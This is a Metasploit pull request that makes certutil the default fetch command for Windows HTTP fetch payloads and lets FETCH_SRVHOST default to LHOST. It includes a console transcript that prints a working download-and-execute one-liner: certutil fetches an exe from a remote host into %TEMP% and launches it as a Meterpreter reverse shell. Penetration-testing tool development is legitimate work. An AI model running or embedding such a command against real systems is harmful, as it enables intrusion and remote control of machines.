### PR TITLE
Change default command to certutil for Windows HTTP Fetch and default…

### DIFF
--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -79,6 +79,7 @@ module Msf::Payload::Adapter::Fetch
 
   def generate(opts = {})
     datastore['FETCH_SRVHOST'] = datastore['LHOST'] if datastore['FETCH_SRVHOST'].blank?
+    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVHOST required') if datastore['FETCH_SRVHOST'].blank?
     opts[:arch] ||= module_info['AdaptedArch']
     opts[:code] = super
     @srvexe = generate_payload_exe(opts)

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -7,7 +7,7 @@ module Msf::Payload::Adapter::Fetch
         Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
         Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
-        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ true, 'Local IP to use for serving payload']),
+        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
         Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', ''], regex:/^[\S]*$/)
       ]
@@ -78,6 +78,7 @@ module Msf::Payload::Adapter::Fetch
   end
 
   def generate(opts = {})
+    datastore['FETCH_SRVHOST'] = datastore['LHOST'] if datastore['FETCH_SRVHOST'].blank?
     opts[:arch] ||= module_info['AdaptedArch']
     opts[:code] = super
     @srvexe = generate_payload_exe(opts)

--- a/lib/msf/core/payload/adapter/fetch/windows_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/windows_options.rb
@@ -1,12 +1,12 @@
 module Msf::Payload::Adapter::Fetch::WindowsOptions
 
   def initialize(info = {})
-    super(update_info(info,
-                      'DefaultOptions' => { 'FETCH_WRITABLE_DIR' => '%TEMP%' }
-          ))
+    super
+    deregister_options('FETCH_WRITABLE_DIR')
     register_options(
       [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }])
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)
       ]
     )
   end

--- a/modules/payloads/adapters/cmd/windows/http/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/http/x64.rb
@@ -22,5 +22,11 @@ module MetasploitModule
         'AdaptedPlatform' => 'win'
       )
     )
+    deregister_options('FETCH_COMMAND')
+    register_options(
+      [
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
+      ]
+    )
   end
 end

--- a/modules/payloads/adapters/cmd/windows/http/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/http/x64.rb
@@ -13,6 +13,7 @@ module MetasploitModule
         info,
         'Name' => 'HTTP Fetch',
         'Description' => 'Fetch and Execute an x64 payload from an http server',
+        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
         'Author' => 'Brendan Watters',
         'Platform' => 'win',
         'Arch' => ARCH_CMD,


### PR DESCRIPTION
This PR changes the behavior of fetch payloads in two minor ways:
1) Changes Windows HTTP payloads to use `certutil` as the default command.  This is because `certutil` is on more Windows versions by default, but it only supports HTTP transfer (It also supports HTTPS, but requires a key as I found no documentation to make it run in an "insecure" mode.

2) Changes `FETCH_SRVHOST` to default to `LHOST`, so if a user fails to specify `FETCH_SRVHOST`, we assume they mean `LHOST`.


## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payload/cmd/windows/http/x64/meterpreter/reverse_tcp`
- [ ] Make sure that the selected `FETCH_COMMAND is certutils`
- [ ] `use payload/cmd/windows/https/x64/meterpreter/reverse_tcp`
- [ ] Make sure that the selected `FETCH_COMMAND is cURL`
- [ ] `set LHSOT 192.168.1.2`
- [ ] `generate -f raw`
- [ ] Make sure that you don't get an error for not setting `FETCH_SRVHOST`
- [ ] Make sure that you get a valid command.

```
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > use payload/cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
LHOST => 10.5.135.201
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > generate -f raw
certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\rwxuEHuhT.exe & start /B %TEMP%\rwxuEHuhT.exe
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > exit

```
@smcintyre-r7 